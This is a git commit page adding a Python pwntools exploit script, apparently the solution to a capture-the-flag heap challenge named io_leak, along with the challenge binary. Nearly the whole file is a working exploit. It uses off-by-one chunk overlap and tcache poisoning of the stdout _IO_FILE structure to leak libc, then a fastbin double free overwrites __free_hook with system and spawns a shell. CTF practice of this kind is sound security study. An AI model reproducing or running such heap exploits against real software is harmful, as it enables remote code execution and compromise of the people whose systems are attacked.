Finished IO_FILE/io_leak
This commit is contained in:
81
IO_FILE/io_leak/answer.py
Executable file
81
IO_FILE/io_leak/answer.py
Executable file
@@ -0,0 +1,81 @@
|
||||
#!/usr/bin/env python2
|
||||
# coding = utf-8
|
||||
|
||||
from pwn import *
|
||||
from LibcSearcher import *
|
||||
context(arch = "amd64", os = "linux", log_level = "debug")
|
||||
|
||||
def send_choice(choice):
|
||||
p.recvuntil('>>>\n')
|
||||
p.sendline(str(choice))
|
||||
|
||||
def add(id, len, content):
|
||||
send_choice(1)
|
||||
p.recvuntil('idx:\n')
|
||||
p.sendline(str(id))
|
||||
p.recvuntil('len:\n')
|
||||
p.sendline(str(len))
|
||||
p.recvuntil('content:\n')
|
||||
p.send(content)
|
||||
|
||||
def delete(id):
|
||||
send_choice(2)
|
||||
p.recvuntil('idx:\n')
|
||||
p.sendline(str(id))
|
||||
|
||||
def leak_libc():
|
||||
_IO_FLAG = 0xfbad3887
|
||||
add(0, 1, '\n') # Chunk #0 to do offbyone
|
||||
add(1, 0x4f0, '\n') # The Large Chunk #1 whose range in UnsortedBin and whose size will be modified
|
||||
add(2, 0xb0, '\n') # The overlapped Chunk #2
|
||||
add(3, 0xb0, '\n') # The chunk to gap between top chunk preventing from consolidating
|
||||
for i in range(7, 15):
|
||||
add(i, 0x60, '\n') # Chunk #8 ~ #14 for future usage
|
||||
delete(2) # Send Chunk #2 to TCache immediately or malloc fail sending after faking enlarged Chunk #1
|
||||
delete(0) # Recreate the Chunk #0 to fake Chunk #1 's size to overlap original Chunk #2
|
||||
add(0, 0x18, '/bin/sh\x00' * 3 + '\xc1')
|
||||
delete(1) # Send the unioned 0x5c0 size chunk to UnsortedBin
|
||||
add(1, 0x4f0, '\n') # Split the Chunk #1 out, lefting Chunk #2 in sortedBin
|
||||
# Currently Chunk #2 in both TCache & UnsortedBin! Leaked libc address in Chunk #2 's `fd` field.
|
||||
add(4, 0x60, '\x60\x47') # Write random Address of stdout in `fd` to allocate a next chunk on (maybe) _IO_FILE struct `stdout`, predication accuracy 1/16
|
||||
add(2, 0xb0, '\n')
|
||||
add(5, 0xb0, p64(_IO_FLAG) + p64(0) * 3 + '\x80') # Write IO_FLAG & _IO_write_base's low byte to point to itself
|
||||
|
||||
elf = ELF('./io_leak')
|
||||
# gdb.attach(p, '')
|
||||
|
||||
while True:
|
||||
try:
|
||||
p = process('./io_leak')
|
||||
leak_libc()
|
||||
stdout_IO_write_base = p.recvuntil('\x7f', timeout=0.5)
|
||||
if len(stdout_IO_write_base) != 0:
|
||||
break
|
||||
except Exception:
|
||||
p.close()
|
||||
continue
|
||||
|
||||
stdout = u64(stdout_IO_write_base.ljust(8, '\x00')) - 0x20
|
||||
log.info('stdout: ' + hex(stdout))
|
||||
libc = LibcSearcher('_IO_2_1_stdout_', stdout)
|
||||
libc_base = stdout - libc.dump('_IO_2_1_stdout_')
|
||||
system_libc = libc_base + libc.dump('system')
|
||||
free_hook = libc_base + libc.dump('__free_hook')
|
||||
log.info('libc_base: ' + hex(libc_base))
|
||||
log.info('system_libc: ' + hex(system_libc))
|
||||
log.info('free_hook: ' + hex(free_hook))
|
||||
|
||||
# gdb.attach(p, '')
|
||||
for i in range(8, 15):
|
||||
delete(i) # Fill TCache Bins to prevent from TCache double free detection
|
||||
delete(2) # FastBin Double Free
|
||||
delete(7)
|
||||
delete(4)
|
||||
for i in range(8, 15):
|
||||
add(i, 0x60, '\n') # Release TCache Bins
|
||||
add(2, 0x60, p64(free_hook)) # TCache has no `size` field check, so we can write any address
|
||||
add(7, 0x60, '\n')
|
||||
add(4, 0x60, '\n')
|
||||
add(6, 0x60, p64(system_libc)) # write `system` to `free_hook`
|
||||
delete(0) # UserMem of Chunk #0 start with '/bin/sh\x00'
|
||||
p.interactive()
|
||||
BIN
IO_FILE/io_leak/io_leak
Executable file
BIN
IO_FILE/io_leak/io_leak
Executable file
Binary file not shown.
BIN
IO_FILE/io_leak/io_leak.i64
Normal file
BIN
IO_FILE/io_leak/io_leak.i64
Normal file
Binary file not shown.
Reference in New Issue
Block a user